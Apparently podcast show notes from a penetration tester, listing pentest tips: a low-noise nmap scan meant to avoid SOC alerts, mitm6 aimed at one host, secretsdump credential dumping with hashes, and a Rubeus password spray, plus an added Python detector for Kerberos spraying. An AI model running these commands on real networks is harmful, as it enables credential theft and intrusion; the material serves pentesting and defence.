7MS #514: Tales of Pentest Pwnage - Part 34
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include:
I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like:
nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile
Using mitm6 in "sniper" mode by targeting just one host with:
mitm6 -hw victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqdn
Using secretsdump to target a single host:
secretsdump.py -target-ip 22.214.171.124 localadmin:@126.96.36.199 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO
Note the colon after localadmin: it's intentional, NOT an error!
Rubeus makes password spraying easy-peasy!
Rubeus.exe spray /password:Winter2022 /outfile:output.txt
Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold!
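The flip side of that spray tip, as an added example that is not from the podcast: a Kerberos spray like the one above shows up on the DC as a burst of event 4771 (pre-auth failed, status 0x18) across many accounts from one source. The log format and sample lines below are constructed for the example, not a real export.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (not real logs): a simplified export of Windows
# Security event 4771 (Kerberos pre-authentication failed). Status 0x18 is
# "bad password". One source tries one password against many accounts.
SAMPLE_LOG = """\
2022-01-10T09:00:01 4771 alice 10.0.0.50 0x18
2022-01-10T09:00:02 4771 bob 10.0.0.50 0x18
2022-01-10T09:00:02 4771 carol 10.0.0.50 0x18
2022-01-10T09:00:03 4771 dave 10.0.0.50 0x18
2022-01-10T09:00:04 4771 erin 10.0.0.50 0x18
2022-01-10T09:05:00 4771 frank 10.0.0.77 0x18
2022-01-10T09:06:00 4771 frank 10.0.0.77 0x18
2022-01-10T09:07:00 4771 frank 10.0.0.77 0x18
2022-01-10T09:30:00 4771 grace 10.0.0.50 0x17
"""

LINE_RE = re.compile(r"^(\S+) 4771 (\S+) (\S+) (0x[0-9a-fA-F]+)$")

def parse_4771(text):
    """Yield (timestamp, account, source_ip, status) for each 4771 line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, account, ip, status = m.groups()
            yield datetime.fromisoformat(ts), account, ip, status

def find_spray_sources(text, window=timedelta(minutes=10), min_accounts=5):
    """Return {source_ip: sorted accounts} for sources whose bad-password
    pre-auth failures (0x18) hit >= min_accounts distinct accounts inside a
    sliding window. One user retrying their own password (frank above) is
    not flagged; many accounts from one source in a short time is the spray shape."""
    events = defaultdict(list)
    for ts, account, ip, status in parse_4771(text):
        if status == "0x18":
            events[ip].append((ts, account))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            accounts = {a for t, a in evs[i:] if t - start <= window}
            if len(accounts) >= min_accounts:
                hits[ip] = sorted(accounts)
                break
    return hits
```

Tune window and min_accounts to the environment; a password-sprayed domain with lockout policies typically shows exactly one attempt per account per window, which is why distinct accounts, not total failures, is the counter.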
LDAPS relaying not working? Make sure it's configured right:
nmap -p636 -sV -iL txt-file-with-dcs-in-it